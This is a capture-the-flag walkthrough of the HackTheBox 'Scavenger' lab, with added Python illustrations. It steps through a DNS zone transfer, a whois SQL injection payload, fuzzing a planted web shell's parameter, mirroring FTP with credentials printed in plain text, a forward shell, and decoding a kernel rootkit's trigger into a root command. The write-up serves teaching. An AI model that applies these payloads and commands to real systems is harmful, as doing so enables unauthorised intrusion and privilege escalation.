HackTheBox - Scavenger

Last updated 4 years ago

Nmap scan results

Enumerating DNS and performing Zone transfer attack

First, add supersechosting.htb to the /etc/hosts file, pointing it at the target (10.10.10.155).

A zone transfer (AXFR) is the process of copying the contents of the zone file on a primary DNS server to a secondary DNS server. It provides fault tolerance by keeping the secondary's copy of the zone in sync with the primary. The security problem is that a server which answers AXFR requests from any client hands its complete list of hostnames to anyone who asks.

The zone transfer is performed with dig on Linux (dig axfr @10.10.10.155 supersechosting.htb).

Enumerating Whois (SQL Injection)

The whois service on the box looks up information about a domain. The query string we send is placed into a SQL statement without escaping, so the same service can be used for SQL injection.

Sending a quote character produces a SQL error, which confirms the injection, so we can send a payload to pull data out. A common payload for a string literal wrapped in parentheses is ') or 1=1-- -

This query returned every row in the table, revealing the following domains hosted on supersechosting.htb:

supersechosting.htb
justanotherblog.htb
pwnhats.htb
rentahacker.htb
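The following is an added example, not code from the writeup or from the box, showing why the payload above works. It emulates a whois lookup whose back end pastes the client's query straight into the SQL, the behaviour the error message revealed, and puts the parameterised version next to it. The table name, column and rows are constructed; the real schema on the box is not known.

```python
import sqlite3

# Constructed data: the four domains the injection returned on the box.
SAMPLE_DOMAINS = [
    ("supersechosting.htb",),
    ("justanotherblog.htb",),
    ("pwnhats.htb",),
    ("rentahacker.htb",),
]

# The payload used against the box: closes the quote and the parenthesis,
# appends a condition that is always true, and comments out the rest.
PAYLOAD = "') or 1=1-- -"


def make_db():
    """In-memory stand-in for the whois service's database (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customers (domain TEXT)")
    conn.executemany("INSERT INTO customers VALUES (?)", SAMPLE_DOMAINS)
    return conn


def whois_vulnerable(conn, query):
    """Lookup the way the vulnerable service does it: the client-supplied
    whois query becomes part of the SQL text, so a quote in the query
    changes the statement instead of being treated as data."""
    sql = "SELECT domain FROM customers WHERE domain = ('%s')" % query
    return [row[0] for row in conn.execute(sql)]


def whois_fixed(conn, query):
    """Same lookup with a bound parameter: the query is always a value."""
    sql = "SELECT domain FROM customers WHERE domain = (?)"
    return [row[0] for row in conn.execute(sql, (query,))]


def probe_for_error(conn, query):
    """True if the query breaks the SQL, i.e. the 'SQL Error' seen on the box."""
    try:
        whois_vulnerable(conn, query)
    except sqlite3.Error:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("lone quote raises an error:", probe_for_error(db, "'"))
    print("normal lookup:", whois_vulnerable(db, "pwnhats.htb"))
    print("injected lookup:", whois_vulnerable(db, PAYLOAD))
    print("parameterised lookup:", whois_fixed(db, PAYLOAD))
```

The injected statement becomes SELECT domain FROM customers WHERE domain = ('') or 1=1-- -'), which dumps the whole table; the bound-parameter version returns nothing because the payload is compared as a literal string.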

Let's add all of these domains to the /etc/hosts file. We can also attempt a zone transfer against each of them with a one-line loop (domains.txt holds one domain per line):

for i in $(cat domains.txt);do dig axfr @10.10.10.155 $i > zone_transfer/${i}.txt;done
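As an added example (not part of the writeup), the loop above extended to turn the AXFR results into /etc/hosts entries: it runs dig for each domain, keeps only the A records, and groups the names by address. The dig output embedded below is constructed for the rentahacker.htb zone and is not the real transfer; a domain that refuses AXFR produces "; Transfer failed." from dig, which the parser simply yields nothing for.

```python
import os
import subprocess

TARGET = "10.10.10.155"  # the box's nameserver

# The domains the whois injection revealed.
DOMAINS = ["supersechosting.htb", "justanotherblog.htb", "pwnhats.htb", "rentahacker.htb"]

# Constructed sample of `dig axfr` output (not the real transfer from the box).
SAMPLE_AXFR = """\
;; global options: +cmd
rentahacker.htb.\t604800\tIN\tSOA\tns1.rentahacker.htb. root.rentahacker.htb. 2 604800 86400 2419200 604800
rentahacker.htb.\t604800\tIN\tNS\tns1.rentahacker.htb.
rentahacker.htb.\t604800\tIN\tA\t10.10.10.155
ns1.rentahacker.htb.\t604800\tIN\tA\t10.10.10.155
sec03.rentahacker.htb.\t604800\tIN\tA\t10.10.10.155
rentahacker.htb.\t604800\tIN\tSOA\tns1.rentahacker.htb. root.rentahacker.htb. 2 604800 86400 2419200 604800
;; Query time: 1 msec
"""

# What dig prints when the server does not allow the transfer.
SAMPLE_AXFR_REFUSED = "; Transfer failed.\n"


def run_axfr(domain, server=TARGET):
    """Request a full zone transfer of `domain` from `server`; return dig's text."""
    proc = subprocess.run(["dig", "axfr", f"@{server}", domain],
                          capture_output=True, text=True, timeout=30)
    return proc.stdout


def a_records(axfr_text):
    """Parse dig axfr output into (name, ip) pairs for every A record.
    dig prints one record per line: name TTL class type rdata; comment
    lines start with ';' and never have 'A' in the type column."""
    records = []
    for line in axfr_text.splitlines():
        parts = line.split()
        if len(parts) >= 5 and parts[2] == "IN" and parts[3] == "A":
            pair = (parts[0].rstrip("."), parts[4])
            if pair not in records:
                records.append(pair)
    return records


def hosts_lines(records):
    """Group names by address into /etc/hosts style lines, in first-seen order."""
    by_ip = {}
    for name, ip in records:
        by_ip.setdefault(ip, []).append(name)
    return [f"{ip} {' '.join(names)}" for ip, names in by_ip.items()]


def transfer_all(domains=DOMAINS, outdir="zone_transfer"):
    """Mirror the writeup's loop: save each transfer to outdir/<domain>.txt
    and return the hosts lines collected from all zones that answered."""
    os.makedirs(outdir, exist_ok=True)
    collected = []
    for domain in domains:
        text = run_axfr(domain)
        with open(os.path.join(outdir, f"{domain}.txt"), "w") as fh:
            fh.write(text)
        collected.extend(a_records(text))
    return hosts_lines(collected)


if __name__ == "__main__":
    # Offline demonstration on the constructed sample; call transfer_all()
    # on the lab network to get the real entries.
    for line in hosts_lines(a_records(SAMPLE_AXFR)):
        print(line)
```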

Exploiting sec03.rentahacker.htb subdomain

The zone transfer for rentahacker.htb reveals a new subdomain: sec03.rentahacker.htb.

After adding all the domains and subdomains, the hosts file should look like this.

We can start a gobuster scan in the background against all of the websites, with the extensions .php, .html and .txt:

gobuster dir -u http://sec03.rentahacker.htb/ -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt -x php,txt,html -o gobuster-files-scan.out -b 404,403

The sec03 page carries the same comment that was found on the WordPress site, which hints that something interesting was left behind there.

Fuzzing hidden parameter using ffuf

The gobuster scan turns up a shell.php that looks like a web shell uploaded by the attacker. Requesting it without the right parameter returns an empty body, so we have to guess the name of the parameter that carries the command. ffuf (or wfuzz) can fuzz it: each candidate name is sent with the value id, and -fs 0 hides the empty responses, so only the parameter that actually executed the command is shown.

ffuf -w /opt/SecLists/Discovery/Web-Content/burp-parameter-names.txt -u http://sec03.rentahacker.htb/shell.php?FUZZ=id -fs 0

Remote Code Execution

This gives us remote code execution on the target. A reverse shell does not work (it later turns out that outgoing connections are blocked), so we explore the usual files on the system through the web shell instead. The mail spool for the user ib01c03 contains an interesting message:

FTP credentials: ib01ftp:YhgRt56_Ta

We can mirror everything on the FTP server with the following command:

wget -m --no-passive ftp://ib01ftp:YhgRt56_Ta@10.10.10.155

Incident Response (Checking log files)

Among the mirrored files are web server logs and a capture we can open in Wireshark. The logs show a number of POST requests; following those requests in Wireshark lets us read their bodies.

This yields another set of credentials: pwnhats@pwnhats.htb:GetYouAH4t!. The same credentials can also be read from the wp-config.php file.
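An added example of the log triage step, not from the writeup: a small parser for Apache combined-format access log lines that pulls out the POST requests (the ones whose bodies are worth following in Wireshark) and summarises them by client and path. The log lines are constructed; the real logs from the FTP server are not reproduced here.

```python
import re
from collections import Counter

# Apache combined log format: client, ident, user, [time], "request", status, size, "referer", "agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed sample lines (not the box's real logs).
SAMPLE_LOG = """\
10.10.14.5 - - [10/Oct/2019:09:12:01 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.10.14.5 - - [10/Oct/2019:09:12:07 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.10.14.5 - - [10/Oct/2019:09:12:30 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 41 "-" "Mozilla/5.0"
10.10.14.9 - - [10/Oct/2019:09:15:44 +0000] "GET /robots.txt HTTP/1.1" 404 209 "-" "curl/7.64.0"
10.10.14.5 - - [10/Oct/2019:09:16:02 +0000] "POST /wp-login.php HTTP/1.1" 200 3911 "-" "Mozilla/5.0"
this line is corrupt and should be skipped
"""


def parse_line(line):
    """Return a dict of fields for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    return rec


def post_requests(log_text):
    """All POST requests as (ip, time, path, status) tuples, in log order."""
    out = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["method"] == "POST":
            out.append((rec["ip"], rec["time"], rec["path"], rec["status"]))
    return out


def post_summary(log_text):
    """Count POSTs per (client, path): repeated POSTs to a login page from one
    client are the first thing to follow in the packet capture."""
    return Counter((ip, path) for ip, _, path, _ in post_requests(log_text))


if __name__ == "__main__":
    for ip, when, path, status in post_requests(SAMPLE_LOG):
        print(f"{when}  {ip:<12} POST {path} -> {status}")
    for (ip, path), n in post_summary(SAMPLE_LOG).most_common():
        print(f"{n} x {ip} -> {path}")
```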

Using forward-shell script to get shell access

Outgoing connections are blocked, which is why the reverse shell never connected back. Instead we use IppSec's forward-shell script.

A forward shell is a way of getting an interactive-style shell over an existing command-injection point: a named pipe (FIFO) is created on the target, a shell process reads its commands from that pipe, and each web request writes a command into the pipe and then reads the shell's output back from a file. Every interaction is an inbound HTTP request, so no outbound connection is needed.

Modify the request parameters (URL and command parameter) and the domain name in the script to match the target before running it.

Analyzing root.c kernel rootkit using Ghidra

The rootkit that root.ko is based on (root.c) is triggered by writing g0tR0ot to /dev/ttyr0.

Now that we have shell access, let's try that.

The root.ko file is present in the following directory: /home/ib01c01/...

Let's open this file in Ghidra and look at the decompiled code.

The decompiled trigger check compares the written data against the constants 0x743367 and 0x76317250. Read as little-endian bytes those are g3t and Pr1v, so writing g3tPr1v to /dev/ttyR0 gives us root. The concept is the same as the original rootkit, but the trigger string was modified.
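As an added example (not from the writeup or the rootkit source), this shows how to turn the integer constants Ghidra displays into the trigger string: the module compares the written bytes as integers, so on this little-endian x86 box the constant's bytes come out in reverse order. It also does the inverse, so a candidate string can be checked against the decompilation. The matches_trigger check is an assumption that the module only looks at the start of the written data; the exact comparison in root.ko is not reproduced here.

```python
# The two constants seen in the decompiled trigger check of root.ko.
CONSTANTS = [0x743367, 0x76317250]
DEVICE = "/dev/ttyR0"


def le_const_to_ascii(value):
    """Decode an integer constant as the little-endian byte string it is
    compared against, e.g. 0x743367 -> bytes 67 33 74 -> 'g3t'."""
    length = max(1, (value.bit_length() + 7) // 8)
    return value.to_bytes(length, "little").decode("ascii")


def ascii_to_le_const(text):
    """Inverse: the constant Ghidra would show for a short ASCII string."""
    return int.from_bytes(text.encode("ascii"), "little")


def trigger_string(constants=CONSTANTS):
    """Concatenate the decoded constants in the order they are checked."""
    return "".join(le_const_to_ascii(c) for c in constants)


def matches_trigger(written, constants=CONSTANTS):
    """Assumed check: the data written to the device starts with the trigger
    string (a trailing newline from echo is therefore harmless)."""
    return written.startswith(trigger_string(constants).encode("ascii"))


def trigger_command(device=DEVICE):
    """Shell command to fire the rootkit from the forward shell (assumed form)."""
    return f"echo {trigger_string()} > {device}"


if __name__ == "__main__":
    for c in CONSTANTS:
        print(f"{c:#x} -> {le_const_to_ascii(c)!r}")
    print("trigger:", trigger_string())
    print("command:", trigger_command())
    # The original rootkit's string, for comparison with what Ghidra showed.
    print(f"g0tR0ot as a constant: {ascii_to_le_const('g0tR0ot'):#x}")
```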

Reference:

https://book.hacktricks.xyz/pentesting/43-pentesting-whois

The malicious content was found on the following domain:

http://sec03.rentahacker.htb/